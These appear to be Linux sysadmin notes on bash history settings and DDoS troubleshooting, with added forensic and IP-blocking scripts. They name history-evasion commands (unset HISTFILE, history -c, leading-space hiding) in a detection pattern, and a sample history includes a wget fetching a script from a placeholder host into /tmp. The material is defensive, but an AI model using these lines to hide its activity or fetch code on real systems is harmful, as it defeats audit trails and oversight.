List All Commands with Date and Timestamp

export HISTTIMEFORMAT='%F %T  '
history

%F is equivalent to %Y-%m-%d and %T to %H:%M:%S. In the history file the timestamps are stored as "#<epoch>" comment lines ahead of each command; entries read from a file written without HISTTIMEFORMAT have no real timestamp, and bash shows the time the file was read for those.

Filter Commands in History

export HISTIGNORE='ls -l:pwd:date:'
history

Commands matching one of the colon-separated HISTIGNORE patterns are not saved.

Ignore Duplicate Commands in History

export HISTCONTROL=ignoredups
history

ignorespace additionally drops any command typed with a leading space, and ignoreboth does both; be aware that an intruder can use a leading space to keep commands out of the history.

Unset a Variable Set with export

unset HISTCONTROL
history

Save the Setting Permanently

Add the export to ~/.bash_profile (or ~/.bashrc) so that it is applied at every login:

vi .bash_profile
PATH=$PATH:$HOME/bin
export PATH
export HISTTIMEFORMAT='%F %T  '

Disable Storing History of Commands

vi .bash_profile
PATH=$PATH:$HOME/bin
HISTSIZE=0
export PATH

source .bash_profile

Delete or Clear History of Commands

history -c

history -c only empties the in-memory list; ~/.bash_history keeps its contents until bash rewrites it on exit, so follow up with history -w (or truncate the file) if the file itself must be emptied.

Search Commands in History Using Grep Command

history | grep pwd

Recall the Last Executed Command

!!

Recall a Command by Its History Number (for example number 8)

!8

Recall the Most Recent Command Starting with a String

!net

List the Last 25 Commands

history 25
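When a host is being investigated, the history file is read in the other direction: the "#<epoch>" lines described above become a timeline, and the commands that disable history (unset HISTFILE, HISTSIZE=0, history -c) are themselves evidence. The following is an added example, not part of the original post, that renders a timestamped history file as dated lines and flags those commands. It assumes GNU date (-d @epoch); the function names and the sample history are constructed for illustration, not taken from a real system.

```shell
#!/bin/sh
# render_history FILE -> "YYYY-MM-DD HH:MM:SS  command" lines (UTC).
# A "#<epoch>" line carries the timestamp of the command that follows it;
# a command with no preceding stamp is marked unknown.
render_history() {
    ts=""
    while IFS= read -r line; do
        case "$line" in
            '#'[0-9]*) ts=${line#"#"}; continue ;;
        esac
        if [ -n "$ts" ]; then
            when=$(date -u -d "@$ts" '+%Y-%m-%d %H:%M:%S')   # GNU date
        else
            when="unknown"
        fi
        printf '%-19s  %s\n' "$when" "$line"
        ts=""
    done < "$1"
}

# flag_antiforensics FILE -> only the rendered lines whose commands look
# like attempts to defeat history logging.
flag_antiforensics() {
    render_history "$1" | grep -E \
        -e 'unset +HISTFILE' -e 'HISTFILE=/dev/null' -e 'HISTSIZE=0' \
        -e 'history +-c' -e 'export +HISTCONTROL=ignore(space|both)' \
        -e '> *~?/?[^ ]*\.bash_history' -e 'shred .*history'
}

# Constructed sample history (not a real capture) for trying the functions.
write_sample() {
    cat > "$1" <<'EOF'
#1400000000
ls -l /etc
#1400000060
unset HISTFILE
#1400000120
wget http://example.invalid/x.sh -O /tmp/.x.sh
#1400000180
history -c
EOF
}
```

Run it on a copy of the file (cp /home/user/.bash_history /case/ first) so the original's timestamps and contents are preserved as evidence; since a user can edit or delete the file at will, treat it as a lead and corroborate with auditd or system logs.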

Ref: 

http://www.tecmint.com/history-command-examples/
https://www.digitalocean.com/community/articles/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps

DoS and DDoS attack

A denial-of-service (DoS) attack or distributed denial-of-service (DDoS) attack is an attack that makes a server's resources unavailable to its intended users.

A DoS attack is an attempt to make a system or service unavailable to legitimate users and, ultimately, to take the service down. One common way is to flood the server's request queue with bogus requests until it can no longer handle the requests of legitimate users.

In general there are two forms of DoS attack: one that crashes a server, and one that merely floods a service until it cannot keep up.

A DDoS attack is the same flood launched from many sources at once (potentially hundreds of thousands), so blocking one or a few IP addresses no longer helps. The more machines in the botnet (zombie network), the more powerful the attack; the bots are usually recruited by infecting machines with a trojan or similar malware.

There are basically three types of DDoS attack:

Application-layer DDoS attack: attacks aimed at the software serving the requests (Apache, Windows, OpenBSD or other server software), either by triggering a vulnerability that crashes it or by sending requests that are individually valid but expensive to serve, so that the application exhausts itself with far less traffic than the other two types need.

Protocol DDoS attack: attacks on the protocol level that exhaust connection state in the server, firewall or load balancer; this category includes SYN floods, the Ping of Death and more.

Volume-based DDoS attack: ICMP floods, UDP floods and other floods, usually sent from spoofed source addresses, that saturate the bandwidth of the link.

How to troubleshoot,

list of IPs by number of connections to the server (most active last),

netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

(cut -d: -f1 keeps the address part of host:port; it does not cope with IPv6 addresses, which contain colons themselves.)

remember that a DDoS is harder to spot this way when the attackers use fewer connections per source and a larger number of attacking IPs,

the number of active connections open to the web server, and how many of them are still half-open (SYN_RECV, the signature of a SYN flood),

netstat -n | grep :80 | wc -l

netstat -n | grep :80 | grep SYN | wc -l

Ex: count requests per client address in the web server's access log (first field), most frequent first,
cd /edu-log/edurite/
awk '{print $1}' 20140505.access.log | sort | uniq -c | sort -nr | more

------------
110.85.112.16
27.153.209.89
120.33.245.187
27.150.229.164
121.205.197.8
121.205.196.173
27.153.186.129
------------

Trace the owner of an IP with whois, either from the shell (whois 27.153.186.129) or via the following URL,

http://tools.whois.net/whoisbyip/

One example of how to block a particular IP on the server,

iptables -I INPUT -s 27.153.186.129 -j DROP

-I inserts the rule at the top of the INPUT chain; -A (append) would place it after any existing ACCEPT rules for port 80 or for established connections, where it might never be reached. Then save the rules so that they survive a restart (RHEL/CentOS) and restart whatever service manages the firewall on that host:

/etc/init.d/iptables save
/etc/init.d/firewall restart
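The following is an added example, not part of the original post, that automates the access-log count above with a threshold and turns the result into iptables commands for review rather than running them: every source is validated as a dotted-quad IPv4 address first, so a crafted log line can never inject text into a firewall rule. The sample log is constructed (one page IP plus a documentation-range address), and the function names are assumptions for illustration.

```shell
#!/bin/sh
# top_talkers LOGFILE THRESHOLD -> "COUNT IP" lines, busiest first, for every
# client (first field of the access log) with at least THRESHOLD requests.
top_talkers() {
    awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' "$1" \
        | sort -rn | awk -v t="$2" '$1 >= t'
}

# block_commands: read "COUNT IP" lines on stdin and print one
# "iptables -I INPUT -s IP -j DROP" per line. -I puts the rule ahead of any
# ACCEPT rules; -A would append after them. Only dotted-quad IPv4 is
# accepted; anything else (IPv6, hostnames, garbage) is reported and skipped.
block_commands() {
    while read -r count ip; do
        if echo "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
            echo "iptables -I INPUT -s $ip -j DROP   # $count requests"
        else
            echo "# skipped unparseable source: $ip" >&2
        fi
    done
}

# write_sample_log FILE: constructed combined-format log, not a real capture.
# 50 requests from one address, two from a normal visitor.
write_sample_log() {
    i=0
    while [ $i -lt 50 ]; do
        echo '27.153.186.129 - - [05/May/2014:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "-"'
        i=$((i + 1))
    done > "$1"
    echo '203.0.113.7 - - [05/May/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "-"' >> "$1"
    echo '203.0.113.7 - - [05/May/2014:10:00:02 +0000] "GET /a.css HTTP/1.1" 200 64 "-" "-"' >> "$1"
}
```

Usage on a real server is top_talkers /var/log/httpd/access_log 1000 | block_commands, then read the output before piping it to sh; a proxy, CDN or NAT gateway can legitimately be the top source, and blocking it would complete the attacker's work.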

Ref:

http://webhosting.uk.com/kb/how-to-check-if-your-linux-server-is-under-ddos-attack/
http://resources.infosecinstitute.com/dos-attacks-free-dos-attacking-tools/